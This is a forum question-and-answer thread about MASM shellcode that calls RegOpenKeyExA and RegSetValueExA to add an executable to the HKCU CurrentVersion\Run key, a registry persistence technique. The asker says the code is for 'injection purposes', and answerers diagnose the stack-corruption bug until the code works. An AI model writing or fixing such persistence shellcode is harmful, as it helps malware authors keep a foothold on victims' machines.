RegOpenKeyExA returns error 998 ERROR_NOACCESS in MASM
I tried to write a MASM program that creates new registry key for my exe file:
; Set hKey with RegOpenKeyExA
Xor Ecx, Ecx
Lea Ebx, [Ebp - 52H]
Push Ebx                        ; phkResult
Push 2H                         ; samDesired = KEY_SET_VALUE
Push Ecx                        ; ulOptions = NULL
Mov Cl, 6EH
Push Ecx
Push 75525C6EH
Push 6F697372H
Push 6556746EH
Push 65727275H
Push 435C7377H
Push 6F646E69H
Push 575C7466H
Push 6F736F72H
Push 63694D5CH
Push 65726177H
Push 74666F53H
Push Esp                        ; lpSubkey = Software\Microsoft\Windows\CurrentVersion\Run
Push 80000001H                  ; hKey = HKEY_CURRENT_USER
Mov Eax, [Ebp - 34H]
Call Eax                        ; Call RegOpenKeyEx
Lea Edi, [Ebp - 52H]

Mov Eax, [Ebp - 3CH]
Lea Edx, [Ebp - 200H]           ; Pointer to buffer that stores exe path
Push Edx
Call Eax                        ; Call lstrlenA

; RegSetValueExA
Xor Ecx, Ecx
Push Eax                        ; cbData
Lea Eax, [Ebp - 200H]
Push Eax                        ; lpData = pointer to the path of the exe
Inc Ecx
Push Ecx                        ; dwType = REG_SZ
Dec Ecx
Push Ecx                        ; Reserved
Push 74696873H
Push Esp                        ; lpValueName
Push Edi                        ; hKey
Mov Eax, [Ebp - 38H]
Call Eax                        ; Call RegSetValueExA

But, when calling RegOpenKeyExA, it returns 0x000003E6 to eax, which indicates that it's error 998, and nothing was returned to phkResult. I think I am missing something very straight forward, but I can't figure out what it is, despite that I have debugged this for a few hours now. Please help.

What are all those extra pushes for (Push 75525C6EH, ...) between the lpSubKey and ulOptions parameters of RegOpenKeyExA? They don't belong there, get rid of them. They are corrupting the call stack, which is why the function fails. It is trying to access invalid memory when writing to its phkResult parameter because you pushed that value out of position on the call stack. RegOpenKeyExA takes 5 parameters (ie 5 pushes), but you are pushing 17 values!

Those pushes are apparently intended to push the key name onto the stack with the final push esp storing the pointer to the start of the string. While it is possible to pass the string across the stack you cannot interleave it with the remaining arguments.

Agreed. If you want to use the stack to hold the key name (why?), then push the key name FIRST, then push the function parameters (including the stack address of the key name), then call the function, then pop the key name off the stack (the function will pop the parameters for you).

those pushes are for the path Software\Microsoft\Windows\Current\Version\Run. I used this method because i'm working on a windows shellcode for injection purposes.

Same mistake when you're attempting to push the "shit" string onto the stack in preparation for the RegSetValueExA() call. A malware author must understand how function calls work.

Can you explain it further to me? I'm still new in this field so there are some mistakes that i'm still trying to avoid.

Argument Passing and Naming Conventions.

@HưngBạch Think about it for a minute. For RegOpenKeyEx0, you are pushing 17 values onto the stack. How do you expect the function to know which values belong to which parameters? It only knows 5 parameters, so there must be only 5 pushes before the call instruction. You are pushing 0x63694D5C into the stack spot for the phkResult parameter, not the address of (Ebp - 0x52) like you intended.

Thanks a lot! I just followed the step you guys gave me and it works!
